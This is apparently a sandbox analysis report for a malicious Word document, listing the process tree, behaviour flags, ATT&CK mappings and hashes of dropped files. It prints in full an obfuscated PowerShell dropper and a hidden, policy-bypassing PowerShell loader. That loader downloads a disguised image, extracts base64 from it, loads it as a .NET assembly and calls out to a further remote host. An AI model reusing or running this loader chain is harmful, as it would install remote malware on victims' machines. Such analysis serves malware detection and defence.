⺔QwBv⤖ ䷮ ⫗ ⫁ ⺔G0⤖ ䷮ ⫗ ⫁ ⺔bQBh⤖ ䷮ ⫗ ⫁ ⺔G4⤖ ䷮ ⫗ ⫁ ⺔Z⤖ ䷮ ⫗ ⫁ ⺔⤖ ䷮ ⫗ ⫁ ⺔g⤖ ䷮ ⫗ ⫁ ⺔D0⤖ ䷮ ⫗ ⫁ ⺔I⤖ ䷮ ⫗ ⫁ ⺔⤖ ䷮ ⫗ ⫁ ⺔k⤖ ䷮ ⫗ ⫁ ⺔Gk⤖ ䷮ ⫗ ⫁ ⺔bQBh⤖ ䷮ ⫗ ⫁ ⺔Gc⤖ ䷮ ⫗ ⫁ ⺔ZQBU⤖ ䷮ ⫗ ⫁ ⺔GU⤖ ䷮ ⫗ ⫁ ⺔e⤖ ䷮ ⫗ ⫁ ⺔B0⤖ ䷮ ⫗ ⫁ ⺔C4⤖ ䷮ ⫗ ⫁ ⺔UwB1⤖ ䷮ ⫗ ⫁ ⺔GI⤖ ䷮ ⫗ ⫁ ⺔cwB0⤖ ䷮ ⫗ ⫁ ⺔HI⤖ ䷮ ⫗ ⫁ ⺔aQBu⤖ ䷮ ⫗ ⫁ ⺔Gc⤖ ䷮ ⫗ ⫁ ⺔K⤖ ䷮ ⫗ ⫁ ⺔⤖ ䷮ ⫗ ⫁ ⺔k⤖ ䷮ ⫗ ⫁ ⺔HM⤖ ䷮ ⫗ ⫁ ⺔d⤖ ䷮ ⫗ ⫁ ⺔Bh⤖ ䷮ ⫗ ⫁ ⺔HI⤖ ䷮ ⫗ ⫁ ⺔d⤖ ䷮ ⫗ ⫁ ⺔BJ⤖ ䷮ ⫗ ⫁ ⺔G4⤖ ䷮ ⫗ ⫁ ⺔Z⤖ ䷮ ⫗ ⫁ ⺔Bl⤖ ䷮ ⫗ ⫁ ⺔Hg⤖ ䷮ ⫗ ⫁ ⺔L⤖ ䷮ ⫗ ⫁ ⺔⤖ ䷮ ⫗ ⫁ ⺔g⤖ ䷮ ⫗ ⫁ ⺔CQ⤖ ䷮ ⫗ ⫁ ⺔YgBh⤖ ䷮ ⫗ ⫁ ⺔HM⤖ ䷮ ⫗ ⫁ ⺔ZQ⤖ ䷮ ⫗ ⫁ ⺔2⤖ ䷮ ⫗ ⫁ ⺔DQ⤖ ䷮ ⫗ ⫁ ⺔T⤖ ䷮ ⫗ ⫁ ⺔Bl⤖ ䷮ ⫗ ⫁ ⺔G4⤖ ䷮ ⫗ ⫁ ⺔ZwB0⤖ ䷮ ⫗ ⫁ ⺔Gg⤖ ䷮ ⫗ ⫁ ⺔KQ⤖ ䷮ ⫗ ⫁ ⺔7⤖ ䷮ ⫗ ⫁ ⺔CQ⤖ ䷮ ⫗ ⫁ ⺔YwBv⤖ ䷮ ⫗ ⫁ ⺔G0⤖ ䷮ ⫗ ⫁ ⺔bQBh⤖ ䷮ ⫗ ⫁ ⺔G4⤖ ䷮ ⫗ ⫁ ⺔Z⤖ ䷮ ⫗ ⫁ ⺔BC⤖ ䷮ ⫗ ⫁ ⺔Hk⤖ ䷮ ⫗ ⫁ ⺔d⤖ ䷮ ⫗ ⫁ ⺔Bl⤖ ䷮ ⫗ ⫁ ⺔HM⤖ ䷮ ⫗ ⫁ ⺔I⤖ ䷮ ⫗ ⫁ ⺔⤖ ䷮ ⫗ ⫁ ⺔9⤖ ䷮ ⫗ ⫁ ⺔C⤖ ䷮ ⫗ ⫁ ⺔⤖ ䷮ ⫗ ⫁ ⺔WwBT⤖ ䷮ ⫗ ⫁ ⺔Hk⤖ ䷮ ⫗ ⫁ ⺔cwB0⤖ ䷮ ⫗ ⫁ ⺔GU⤖ ䷮ ⫗ ⫁ ⺔bQ⤖ ䷮ ⫗ ⫁ ⺔u⤖ ䷮ ⫗ ⫁ ⺔EM⤖ ䷮ ⫗ ⫁ ⺔bwBu⤖ ䷮ ⫗ ⫁ ⺔HY⤖ ䷮ ⫗ ⫁ ⺔ZQBy⤖ ䷮ ⫗ ⫁ ⺔HQ⤖ ䷮ ⫗ ⫁ ⺔XQ⤖ ䷮ ⫗ ⫁ ⺔6⤖ ䷮ ⫗ ⫁ ⺔Do⤖ ䷮ ⫗ ⫁ ⺔RgBy⤖ ䷮ ⫗ ⫁ ⺔G8⤖ ䷮ ⫗ ⫁ ⺔bQBC⤖ ䷮ ⫗ ⫁ ⺔GE⤖ ䷮ ⫗ ⫁ ⺔cwBl⤖ ䷮ ⫗ ⫁ ⺔DY⤖ ䷮ ⫗ ⫁ ⺔N⤖ ䷮ ⫗ ⫁ ⺔BT⤖ ䷮ ⫗ ⫁ ⺔HQ⤖ ䷮ ⫗ ⫁ ⺔cgBp⤖ ䷮ ⫗ ⫁ ⺔G4⤖ ䷮ ⫗ ⫁ ⺔Zw⤖ ䷮ ⫗ ⫁ ⺔o⤖ ䷮ ⫗ ⫁ ⺔CQ⤖ ䷮ ⫗ ⫁ ⺔YgBh⤖ ䷮ ⫗ ⫁ ⺔HM⤖ ䷮ ⫗ ⫁ ⺔ZQ⤖ ䷮ ⫗ ⫁ ⺔2⤖ ䷮ ⫗ ⫁ ⺔DQ⤖ ䷮ ⫗ ⫁ ⺔QwBv⤖ ䷮ ⫗ ⫁ ⺔G0⤖ ䷮ ⫗ ⫁ ⺔bQBh⤖ ䷮ ⫗ ⫁ ⺔G4⤖ ䷮ ⫗ ⫁ ⺔Z⤖ ䷮ ⫗ ⫁ ⺔⤖ ䷮ ⫗ ⫁ ⺔p⤖ ䷮ ⫗ ⫁ ⺔Ds⤖ ䷮ ⫗ ⫁ ⺔J⤖ ䷮ ⫗ ⫁ ⺔Bs⤖ ䷮ ⫗ ⫁ ⺔G8⤖ ䷮ ⫗ ⫁ ⺔YQBk⤖ ䷮ ⫗ ⫁ ⺔GU⤖ ䷮ ⫗ ⫁ ⺔Z⤖ ䷮ ⫗ ⫁ ⺔BB⤖ ䷮ ⫗ ⫁ ⺔HM⤖ ䷮ ⫗ ⫁ ⺔cwBl⤖ ䷮ ⫗ ⫁ ⺔G0⤖ ䷮ ⫗ ⫁ ⺔YgBs⤖ ䷮ ⫗ ⫁ ⺔Hk⤖ ䷮ ⫗ ⫁ ⺔I⤖ ䷮ ⫗ ⫁ ⺔⤖ ䷮ ⫗ ⫁ ⺔9⤖ ䷮ ⫗ ⫁ ⺔C⤖ ䷮ ⫗ ⫁ ⺔⤖ ䷮ ⫗ ⫁ ⺔WwBT⤖ ䷮ ⫗ ⫁ ⺔Hk⤖ ䷮ ⫗ ⫁ ⺔cwB0⤖ ䷮ ⫗ ⫁ ⺔GU⤖ ䷮ ⫗ ⫁ ⺔bQ⤖ ䷮ ⫗ ⫁ ⺔u⤖ ䷮ ⫗ ⫁ ⺔FI⤖ ䷮ ⫗ ⫁ ⺔ZQBm⤖ ䷮ ⫗ ⫁ ⺔Gw⤖ ䷮ ⫗ ⫁ ⺔ZQBj⤖ ䷮ ⫗ ⫁ ⺔HQ⤖ ䷮ ⫗ ⫁ ⺔aQBv⤖ ䷮ ⫗ ⫁ ⺔G4⤖ ䷮ ⫗ ⫁ ⺔LgBB⤖ ䷮ ⫗ ⫁ ⺔HM⤖ ䷮ ⫗ ⫁ ⺔cwBl⤖ ䷮ ⫗ ⫁ ⺔G0⤖ ䷮ ⫗ ⫁ ⺔YgBs⤖ ䷮ ⫗ ⫁ ⺔Hk⤖ ䷮ ⫗ ⫁ ⺔XQ⤖ ䷮ ⫗ ⫁ ⺔6⤖ ䷮ ⫗ ⫁ ⺔Do⤖ ䷮ ⫗ ⫁ ⺔T⤖ ䷮ ⫗ ⫁ ⺔Bv⤖ ䷮ ⫗ ⫁ ⺔GE⤖ ䷮ ⫗ ⫁ ⺔Z⤖ ䷮ ⫗ ⫁ ⺔⤖ ䷮ ⫗ ⫁ ⺔o⤖ ䷮ ⫗ ⫁ ⺔CQ⤖ ䷮ ⫗ ⫁ ⺔YwBv⤖ ䷮ ⫗ ⫁ ⺔G0⤖ ䷮ ⫗ ⫁ ⺔bQBh⤖ ䷮ ⫗ ⫁ ⺔G4⤖ ䷮ ⫗ ⫁ ⺔Z⤖ ䷮ ⫗ ⫁ ⺔BC⤖ ䷮ ⫗ ⫁ ⺔Hk⤖ ䷮ ⫗ ⫁ ⺔d⤖ ䷮ ⫗ ⫁ ⺔Bl⤖ ䷮ ⫗ ⫁ ⺔HM⤖ ䷮ ⫗ ⫁ ⺔KQ⤖ ䷮ ⫗ ⫁ ⺔7⤖ ䷮ ⫗ ⫁ ⺔CQ⤖ ䷮ ⫗ ⫁ ⺔d⤖ ䷮ ⫗ ⫁ ⺔B5⤖ ䷮ ⫗ ⫁ ⺔H⤖ ䷮ ⫗ ⫁ ⺔⤖ ䷮ ⫗ ⫁ ⺔ZQ⤖ ䷮ ⫗ ⫁ ⺔g⤖ ䷮ ⫗ ⫁ ⺔D0⤖ ䷮ ⫗ ⫁ ⺔I⤖ ䷮ ⫗ ⫁ ⺔⤖ ䷮ ⫗ ⫁ ⺔k⤖ ䷮ ⫗ ⫁ ⺔Gw⤖ ䷮ ⫗ ⫁ ⺔bwBh⤖ ䷮ ⫗ ⫁ ⺔GQ⤖ ䷮ ⫗ ⫁ ⺔ZQBk⤖ ䷮ ⫗ ⫁ ⺔EE⤖ ䷮ ⫗ ⫁ ⺔cwBz⤖ ䷮ ⫗ ⫁ ⺔GU⤖ ䷮ ⫗ ⫁ ⺔bQBi⤖ ䷮ ⫗ ⫁ ⺔Gw⤖ ䷮ ⫗ ⫁ ⺔eQ⤖ ䷮ ⫗ ⫁ ⺔u⤖ ䷮ ⫗ ⫁ ⺔Ec⤖ ䷮ ⫗ ⫁ ⺔ZQB0⤖ ䷮ ⫗ ⫁ ⺔FQ⤖ ䷮ ⫗ ⫁ ⺔eQBw⤖ ䷮ ⫗ ⫁ ⺔GU⤖ ䷮ ⫗ ⫁ ⺔K⤖ ䷮ ⫗ ⫁ ⺔⤖ ䷮ ⫗ ⫁ ⺔n⤖ ䷮ ⫗ ⫁ ⺔GQ⤖ ䷮ ⫗ ⫁ ⺔bgBs⤖ ䷮ ⫗ ⫁ ⺔Gk⤖ ䷮ ⫗ ⫁ ⺔Yg⤖ ䷮ ⫗ ⫁ ⺔u⤖ ䷮ ⫗ ⫁ ⺔Ek⤖ ䷮ ⫗ ⫁ ⺔Tw⤖ ䷮ ⫗ ⫁ ⺔u⤖ ䷮ ⫗ ⫁ ⺔Eg⤖ ䷮ ⫗ ⫁ ⺔bwBt⤖ ䷮ ⫗ ⫁ ⺔GU⤖ ䷮ ⫗ ⫁ ⺔Jw⤖ ䷮ ⫗ ⫁ ⺔p⤖ ䷮ ⫗ ⫁ ⺔Ds⤖ ䷮ ⫗ ⫁ ⺔J⤖ ䷮ ⫗ ⫁ ⺔Bt⤖ ䷮ ⫗ ⫁ ⺔GU⤖ ䷮ ⫗ ⫁ ⺔d⤖ ䷮ ⫗ ⫁ ⺔Bo⤖ ䷮ ⫗ ⫁ ⺔G8⤖ ䷮ ⫗ ⫁ ⺔Z⤖ ䷮ ⫗ ⫁ ⺔⤖ ䷮ ⫗ ⫁ ⺔g⤖ ䷮ ⫗ ⫁ ⺔D0⤖ ䷮ ⫗ ⫁ ⺔I⤖ ䷮ ⫗ ⫁ ⺔⤖ ䷮ ⫗ ⫁ ⺔k⤖ ䷮ ⫗ ⫁ ⺔HQ⤖ ䷮ ⫗ ⫁ ⺔eQBw⤖ ䷮ ⫗ ⫁ ⺔GU⤖ ䷮ ⫗ ⫁ ⺔LgBH⤖ ䷮ ⫗ ⫁ ⺔GU⤖ ䷮ ⫗ ⫁ ⺔d⤖ ䷮ ⫗ ⫁ ⺔BN⤖ ䷮ ⫗ ⫁ ⺔GU⤖ ䷮ ⫗ ⫁ ⺔d⤖ ䷮ ⫗ ⫁ ⺔Bo⤖ ䷮ ⫗ ⫁ ⺔G8⤖ ䷮ ⫗ ⫁ ⺔Z⤖ ䷮ ⫗ ⫁ ⺔⤖ ䷮ ⫗ ⫁ ⺔o⤖ ䷮ ⫗ ⫁ ⺔Cc⤖ ䷮ ⫗ ⫁ ⺔VgBB⤖ ䷮ ⫗ ⫁ ⺔Ek⤖ ䷮ ⫗ ⫁ ⺔Jw⤖ ䷮ ⫗ ⫁ ⺔p⤖ ䷮ ⫗ ⫁ ⺔C4⤖ ䷮ ⫗ ⫁ ⺔SQBu⤖ ䷮ ⫗ ⫁ ⺔HY⤖ ䷮ ⫗ ⫁ ⺔bwBr⤖ ䷮ ⫗ ⫁ ⺔GU⤖ ䷮ ⫗ ⫁ ⺔K⤖ ䷮ ⫗ ⫁ ⺔⤖ ䷮ ⫗ ⫁ ⺔k⤖ ䷮ ⫗ ⫁ ⺔G4⤖ ䷮ ⫗ ⫁ ⺔dQBs⤖ ䷮ ⫗ ⫁ ⺔Gw⤖ ䷮ ⫗ ⫁ ⺔L⤖ ䷮ ⫗ ⫁ ⺔⤖ ䷮ ⫗ ⫁ ⺔g⤖ ䷮ ⫗ ⫁ ⺔Fs⤖ ䷮ ⫗ ⫁ ⺔bwBi⤖ ䷮ ⫗ ⫁ ⺔Go⤖ ䷮ ⫗ ⫁ ⺔ZQBj⤖ ䷮ ⫗ ⫁ ⺔HQ⤖ ䷮ ⫗ ⫁ ⺔WwBd⤖ ䷮ ⫗ ⫁ ⺔F0⤖ ䷮ ⫗ ⫁ ⺔I⤖ ䷮ ⫗ ⫁ ⺔⤖ ䷮ ⫗ ⫁ ⺔o⤖ ䷮ ⫗ ⫁ ⺔Cc⤖ ䷮ ⫗ ⫁ ⺔d⤖ ䷮ ⫗ ⫁ ⺔B4⤖ ䷮ ⫗ ⫁ ⺔HQ⤖ ䷮ ⫗ ⫁ ⺔LgBD⤖ ䷮ ⫗ ⫁ ⺔EM⤖ ䷮ ⫗ ⫁ ⺔UgBW⤖ ䷮ ⫗ ⫁ ⺔FM⤖ ䷮ ⫗ ⫁ ⺔Lw⤖ ䷮ ⫗ ⫁ ⺔y⤖ ䷮ ⫗ ⫁ ⺔DE⤖ ䷮ ⫗ ⫁ ⺔MQ⤖ ䷮ ⫗ ⫁ ⺔v⤖ ䷮ ⫗ ⫁ ⺔DM⤖ ䷮ ⫗ ⫁ ⺔OQ⤖ ䷮ ⫗ ⫁ ⺔u⤖ ䷮ ⫗ ⫁ ⺔DQ⤖ ䷮ ⫗ ⫁ ⺔Ng⤖ ䷮ ⫗ ⫁ ⺔u⤖ ䷮ ⫗ ⫁ ⺔Dc⤖ ䷮ ⫗ ⫁ ⺔OQ⤖ ䷮ ⫗ ⫁ ⺔x⤖ ䷮ ⫗ ⫁ ⺔C4⤖ ䷮ ⫗ ⫁ ⺔Mg⤖ ䷮ ⫗ ⫁ ⺔4⤖ ䷮ ⫗ ⫁ ⺔C8⤖ ䷮ ⫗ ⫁ ⺔Lw⤖ ䷮ ⫗ ⫁ ⺔6⤖ ䷮ ⫗ ⫁ ⺔H⤖ ䷮ ⫗ ⫁ ⺔⤖ ䷮ ⫗ ⫁ ⺔d⤖ ䷮ ⫗ ⫁ ⺔B0⤖ ䷮ ⫗ ⫁ ⺔Gg⤖ ䷮ ⫗ ⫁ ⺔Jw⤖ ䷮ ⫗ ⫁ ⺔g⤖ ䷮ ⫗ ⫁ ⺔Cw⤖ ䷮ ⫗ ⫁ ⺔I⤖ ䷮ ⫗ ⫁ ⺔⤖ ䷮ ⫗ ⫁ ⺔n⤖ ䷮ ⫗ ⫁ ⺔GQ⤖ ䷮ ⫗ ⫁ ⺔ZQBz⤖ ䷮ ⫗ ⫁ ⺔GE⤖ ䷮ ⫗ ⫁ ⺔d⤖ ䷮ ⫗ ⫁ ⺔Bp⤖ ䷮ ⫗ ⫁ ⺔HY⤖ ䷮ ⫗ ⫁ ⺔YQBk⤖ ䷮ ⫗ ⫁ ⺔G8⤖ ䷮ ⫗ ⫁ ⺔Jw⤖ ䷮ ⫗ ⫁ ⺔g⤖ ䷮ ⫗ ⫁ ⺔Cw⤖ ䷮ ⫗ ⫁ ⺔I⤖ ䷮ ⫗ ⫁ ⺔⤖ ䷮ ⫗ ⫁ ⺔n⤖ ䷮ ⫗ ⫁ ⺔GQ⤖ ䷮ ⫗ ⫁ ⺔ZQBz⤖ ䷮ ⫗ ⫁ ⺔GE⤖ ䷮ ⫗ ⫁ ⺔d⤖ ䷮ ⫗ ⫁ ⺔Bp⤖ ䷮ ⫗ ⫁ ⺔HY⤖ ䷮ ⫗ ⫁ ⺔YQBk⤖ ䷮ ⫗ ⫁ ⺔G8⤖ ䷮ ⫗ ⫁ ⺔Jw⤖ ䷮ ⫗ ⫁ ⺔g⤖ ䷮ ⫗ ⫁ ⺔Cw⤖ ䷮ ⫗ ⫁ ⺔I⤖ ䷮ ⫗ ⫁ ⺔⤖ ䷮ ⫗ ⫁ ⺔n⤖ ䷮ ⫗ ⫁ ⺔GQ⤖ ䷮ ⫗ ⫁ ⺔ZQBz⤖ ䷮ ⫗ ⫁ ⺔GE⤖ ䷮ ⫗ ⫁ ⺔d⤖ ䷮ ⫗ ⫁ ⺔Bp⤖ ䷮ ⫗ ⫁ ⺔HY⤖ ䷮ ⫗ ⫁ ⺔YQBk⤖ ䷮ ⫗ ⫁ ⺔G8⤖ ䷮ ⫗ ⫁ ⺔Jw⤖ ䷮ ⫗ ⫁ ⺔s⤖ ䷮ ⫗ ⫁ ⺔Cc⤖ ䷮ ⫗ ⫁ ⺔UgBl⤖ ䷮ ⫗ ⫁ ⺔Gc⤖ ䷮ ⫗ ⫁ ⺔QQBz⤖ ䷮ ⫗ ⫁ ⺔G0⤖ ䷮ ⫗ ⫁ ⺔Jw⤖ ䷮ ⫗ ⫁ ⺔s⤖ ䷮ ⫗ ⫁ ⺔Cc⤖ ䷮ ⫗ ⫁ ⺔Jw⤖ ䷮ ⫗ ⫁ ⺔p⤖ ䷮ ⫗ ⫁ ⺔Ck⤖ ䷮ ⫗ ⫁ ⺔';$OWjuxD = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $Codigo.replace('⤖ ䷮ ⫗ ⫁ ⺔','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD3⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2696 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.CCRVS/211/39.46.791.28//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:552
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{55AD53FA-F26D-4589-A55D-0CAFDA501160}.FSD
Filesize128KB
MD5a9a64d835d40bfc9881e5b3df02a84a7
SHA1274c4777894af49a1c18389048a813649ef88313
SHA2567cf77fd2396c9757a2fb8cc7da82961bdf433a85f12ce53d1fc14a898586ec31
SHA5126419ae97be0bb004199c1bff974e4b5a1d6dd1f2aa18bbb37dd3aef08dda4d065de06652c5a5cef3527248e9cfee7527e006f0fdf492406dbb8fd21e7155f138
-
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD
Filesize128KB
MD5204b55f54d5d2e4895d07ae762bced47
SHA12965bcb6c400e255a1270d5f440139f69d503641
SHA256a550c6bb77bc972919d3c986a329c57b5d907ada5e296f09b52443d572442b09
SHA512c0888b4fbeebe7323e7dcd9510cb99e93dbb04b47300b782361a9a76953f13c5a743baf648533f6559ccb175366e91fc0997d045ddc18bab97e7c85cdb129eba
-
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{84946386-25C3-4B4A-997B-788D6DDB0A6E}.FSD
Filesize128KB
MD5cb7839b3e6da0dc47e52fb8c8a92f91d
SHA1d47afec6d42b565a9eb59721748158bbfb5b9f19
SHA256f3d99092ba39563ed36a3cbffb333b044220a2fdbfb67393062fbf195e44deeb
SHA5122a3ebfcacaf6d08c8155ca1caa50602060b376439f22eab82e85e6797fff98d0397f58a4faddc0f230da3ee2e18cc75bc54b12696f37eb9450d29eecdd31b9ab
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\WNZH54VQ\butteryummycakechocolatebunreallyyummytoeatwithsweetlipsitsreallynicefoodwhichicanfeeltogivemylovershelovebutterbun____yummysweetbutterbun[1].doc
Filesize87KB
MD57d3b215b98532e8570e22f353da4223e
SHA1004b80efe852e998a9ec7c67cf524d5abb660d1c
SHA256098bfe7ab9c2ca61fc488b0e9751adc098330485b49023852a3fcccace8a227f
SHA51249f9ef28d030c16cf5035f4a9fadecb385e37603093b3d6c6a871b8dcab3f23ae068e1f19fd38b8a62946eaf77cff8fd8f428a73fb7e90f09b74a64a9d8f0f64
-
Filesize
128KB
MD5f00a9e16b47993be2e868a201db1d971
SHA16974586b2e2e2a6f1c67b741f64564d21b792a85
SHA2565a3be69cb434afe78bbf95a413bbd67636ebb941ac0256c0d38f535253a33cb7
SHA512a78362b074a5b440d59a9701386bd5397049a0ac250f27e5243f572c0978fab8318e39243343117a8b8ec725b79a13774e0e5014a70bcfd81cb8ae3e207c1c7e
-
Filesize
19KB
MD5364c8516d4c4ea54aeee5a21de86ec19
SHA17c9396ea25b86ac7253f801d2ee294eb7c1a301e
SHA256554494d212b150a1fad7ec1481be9eb45e2214295eb026981948d2dafec54b58
SHA512c1e499e7d1224aaeee8587bd3f547d38f34f4b57433a01981c4d326efd08ce533fefcac7696e3214486f718f1d713b81775689811f33fc1e80798c6f4feb7d25
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD5d50ce7089e147734cc486e2b1974a7e8
SHA133042e69dd994078af5e5183bfb4d8e41650c213
SHA256013d5858d32b5839e4dab81d763fe0750e0d25a0ceeba017503dc7f76dfe3bcf
SHA5126095017f5ca8e921d9dc8a2c84b2513dc23ff6dbb95ca5cdbc271f60160f3893e3067fa9761878dcfd49eec6666a32ae3cb891b4cd3e7e09bc2b74cea77ff328
-
Filesize
177KB
MD5151ae78820d98d8873534bf1cdb53c8e
SHA150a463097f5bb500fcb65e4443243b38e836c61c
SHA2566949f04397e5341b1001fd30382b704065a7d1982c9bb07eb9308714bc416aab
SHA5123ea41997e5bcd53ea2518f56b2f01d81083b7d885e8cca76f9fde07799809ad2e2115c3056b005dd2211c82e6b29b88e15df0dfaa871746d574078a9c10d3bde